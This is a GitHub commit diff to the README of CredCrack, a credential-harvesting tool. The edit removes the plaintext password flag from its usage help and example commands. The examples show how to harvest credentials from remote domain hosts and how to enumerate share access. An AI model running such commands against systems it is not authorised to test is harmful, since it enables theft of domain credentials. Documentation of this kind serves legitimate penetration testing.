Skip to content

Commit c65bee2

Browse files
committed
Update README.md
1 parent 6c2f358 commit c65bee2

File tree

1 file changed

+10
-8
lines changed

1 file changed

+10
-8
lines changed

README.md

Lines changed: 10 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,9 @@ CredCrack has been tested and runs with the tools found natively in Kali Linux.
1010
## Help
1111
-----
1212
```
13+
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
14+
[-l LHOST] [-t THREADS]
15+
1316
CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)
1417
1518
optional arguments:
@@ -18,7 +21,7 @@ optional arguments:
1821
line.
1922
-r RHOST, --rhost RHOST
2023
Remote host IP to harvest creds from.
21-
-es, --enumshares Examine share access on the remote IP(s)
24+
-es, --enumshares Examine share access on the remote IP(s)
2225
-l LHOST, --lhost LHOST
2326
Local host IP to launch scans from.
2427
-t THREADS, --threads THREADS
@@ -28,13 +31,11 @@ Required:
2831
-d DOMAIN, --domain DOMAIN
2932
Domain or Workstation
3033
-u USER, --user USER Domain username
31-
-p PASSWD, --passwd PASSWD
32-
Domain user password
3334
3435
Examples:
3536
36-
./credcrack.py -d acme -u bob -p Password123 -f hosts --enumshares
37-
./credcrack.py -d acme -u bob -p Password123 -f hosts -l 192.168.1.102 -t 20
37+
./credcrack.py -d acme -u bob -f hosts -es
38+
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
3839
```
3940

4041
## Examples
@@ -43,8 +44,8 @@ Examples:
4344
###Enumerating Share Access
4445

4546
```
46-
./credcrack.py -r 192.168.1.100 -d acme -u bob -p Password123 --es
47-
47+
./credcrack.py -r 192.168.1.100 -d acme -u bob --es
48+
Password:
4849
---------------------------------------------------------------------
4950
CredCrack v1.0 by Jonathan Broche (@g0jhonny)
5051
---------------------------------------------------------------------
@@ -84,7 +85,8 @@ Examples:
8485
-----
8586

8687
```
87-
./credcrack.py -f hosts -d acme -u bob -p Password123 -l 192.168.1.100
88+
./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
89+
Password:
8890
8991
---------------------------------------------------------------------
9092
CredCrack v1.0 by Jonathan Broche (@g0jhonny)

0 commit comments

Comments
 (0)